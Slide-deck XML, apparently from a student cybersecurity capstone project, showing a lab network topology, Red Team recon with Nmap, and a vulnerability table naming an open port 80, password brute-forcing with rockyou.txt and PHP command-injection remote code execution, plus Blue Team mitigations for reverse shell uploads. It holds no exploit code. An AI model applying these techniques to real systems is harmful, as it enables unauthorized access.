              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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78"/>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Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1300" name="Google Shape;1300;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91440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27</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1301" name="Google Shape;1301;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="160245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400"/>
              <a:t>Monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> all incoming uploads and setup an alert for anything triggered by anti-virus/anti-malware.</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Create an alert for files that contain suspicious code/scripts/file extensions.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
        <p:nvSpPr>
          <p:cNvPr id="1302" name="Google Shape;1302;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Setup a secure anti-virus/anti-malware application that screens all incoming files and automatically updates daily.</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Update firewall rules.</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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Limit file types that can be uploaded, including restricting php.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="2088475"/>
            <a:ext cx="8595300" cy="79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Network Topology </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p56"/>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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1883700" cy="3897600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="182875" lIns="182875" spcFirstLastPara="1" rIns="182875" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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b="1" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Range: 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Gateway: 10.0.0.1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indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IPv4: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: Hyper-V ML-REFVM-684427</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192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: Kali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192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: Ubuntu - Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: ELK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IPv4: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: Ubuntu - Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: Capstone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058" name="Google Shape;1058;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="9085500" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="274300" spcFirstLastPara="1" rIns="0" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="8229600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4																	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397529" y="710788"/>
            <a:ext cx="6172199" cy="4028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pic>
        <p:nvPicPr>
          <p:cNvPr id="1065" name="Google Shape;1065;p58"/>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066" name="Google Shape;1066;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607775" y="4957200"/>
            <a:ext cx="261900" cy="105600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" sz="600"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Google Shape;1067;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1851100"/>
            <a:ext cx="8595300" cy="102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Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">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068" name="Google Shape;1068;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="79719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59"/>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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;p59"/>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marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>identified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t> the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="Google Shape;1075;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="90117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6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1076" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{9B23E420-18AE-46B4-81B6-046E546AB3B5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2782200"/>
                <a:gridCol w="2782200"/>
                <a:gridCol w="2782200"/>
              </a:tblGrid>
              <a:tr h="40322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T="91425" marB="91425" marR="182875" marL="182875" anchor="ctr">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990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Capstone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Target Machine - Replicating a vulnerable server</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Attacking Machine for Penetration Testing</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ELK</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SIEM System - Running Kibana - Logs data from Capstone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r h="793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ML-REFVM-684427 (Hyper-V Azure Machine)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200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Virtual Host Machine</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>  - Hosting the 3 VMs above)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="182875" marL="182875">
                    <a:lnL cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:schemeClr val="accent3"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:schemeClr val="accent3"/>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accent3"/>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60"/>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p60"/>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83" name="Google Shape;1083;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91686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7</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="459075" y="1040775"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{9B23E420-18AE-46B4-81B6-046E546AB3B5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2803625"/>
                <a:gridCol w="2771375"/>
              </a:tblGrid>
              <a:tr h="336475">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1185875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Open Port 80 with public access</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CVE-2019-6579 </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Attackers are able to access sensitive private information through open ports.  Port 80 is most commonly used for web communication and if left open and unsecure it can allow public access.</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100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This vulnerability </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>allows</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> access into the web server.  Files and folders are readily accessible.  Sensitive and secret files and folders can be found.  The Red Team was able to access company folders with secret files which had the hashed password.</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1332900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute-force Attack</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An attack that consists of checking all possible username and password combinations until the correct one is found.</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100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This type of attack can have a significant impact because the attacker can cause loss of data, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>identity</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> theft, and unauthorized access to confidential data. With the se of brute force and a common passwords list (rockyou.txt) the password can be easily found.</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61"/>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Vulnerability Assessment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>(continued)</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="364800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">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091" name="Google Shape;1091;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91440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8</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1092" name="Google Shape;1092;p61"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="459075" y="1040775"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{9B23E420-18AE-46B4-81B6-046E546AB3B5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2803625"/>
                <a:gridCol w="2771375"/>
              </a:tblGrid>
              <a:tr h="397450">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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">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T="91425" marB="91425" marR="182875" marL="182875" anchor="ctr">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990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="767375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Remote Code Execution via Command Injection (OWASP Top 10) Critical</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sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attackers can use PHP scripts to execute arbitrary shell commands remotely through inappropriately open ports (ie. port 80).   </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Clr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
